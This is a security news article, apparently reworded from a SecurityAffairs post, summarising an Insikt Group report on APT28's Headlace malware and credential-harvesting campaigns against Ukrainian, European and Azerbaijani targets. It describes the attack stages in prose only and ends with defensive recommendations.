APT28 aims at essential networks in Europe with HeadLace malware
June 03, 2024
The HeadLace malware and credential-harvesting web pages were utilized by Russia-linked APT28 in assaults on networks throughout Europe.
Security analysts at Insikt Group noted that APT28 targeted networks across Europe using information-stealing Headlace and credential-harvesting web pages. The APT used Headlace in three separate stages from April to December 2023, employing phishing, compromised online services, and living off the land binaries. The credential gathering pages were crafted to hit the Ministry of Defence in Ukraine, European transportation systems, and a think tank in Azerbaijan. The credential-harvesting pages developed by the group can bypass two-factor authentication and CAPTCHA challenges by redirecting requests from legitimate services to compromised Ubiquiti routers.
In certain cases, threat actors built custom web pages on Mocky interacting with a Python script executing on compromised Ubiquiti routers to extract the provided credentials.
The compromise of networks related to the Ministry of Defence in Ukraine and European railway systems may provide attackers with intelligence to influence battlefield tactics and broader military strategies. Additionally, their attention on the Azerbaijan Center for Economic and Social Development suggests a potential interest in comprehending and possibly influencing regional policies.
Insikt Group speculates that the operation is designed to influence regional and military dynamics.
The APT28 group (also known as Fancy Bear, Pawn Storm, Sofacy Group, Sednit, BlueDelta, and STRONTIUM) has been active since at least 2007 and has targeted governments, militaries, and security organizations worldwide. The group was also implicated in the series of attacks on the 2016 Presidential election.
The group operates within military unity 26165 of the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS).
The attack progression used in the incidents outlined by Insikt Group consists of seven distinct infrastructure phases designed to filter out sandbox environments, incompatible operating systems, and non-targeted countries. Victims who passed these checks downloaded a benign file and were directed to Microsoft’s portal, msn.com. Those who cleared the checks downloaded a malicious Windows BAT script that linked to a free API service to execute successive shell commands.
In December 2023, researchers from Proofpoint and IBM disclosed a new series of APT spear-phishing attacks leveraging multiple bait content to distribute the Headlace malware. These campaigns targeted at least thirteen different countries.
“By analyzing Headlace geofencing scripts and the countries targeted by the credential-harvesting campaigns from 2022 onwards, Insikt Group identified that thirteen distinct countries had been targeted by BlueDelta. As anticipated, Ukraine ranked first with 40% of the activity,” reads the report published by the Insikt Group. “Turkey might appear as an unexpected target with 10%, but it’s crucial to note that it was specifically singled out only by Headlace geofencing, unlike Ukraine, Poland, and Azerbaijan, which were targeted through both Headlace geofencing and credential harvesting.”
Analysts urge government, military, defense, and related organizations to enhance cybersecurity protocols by focusing on detecting advanced phishing attempts, limiting access to non-critical online services, and fortifying surveillance of important network infrastructure.
Follow me on Twitter: @securityaffairs and Facebook and Mastodon
(SecurityAffairs – hacking, Russia)
About Author
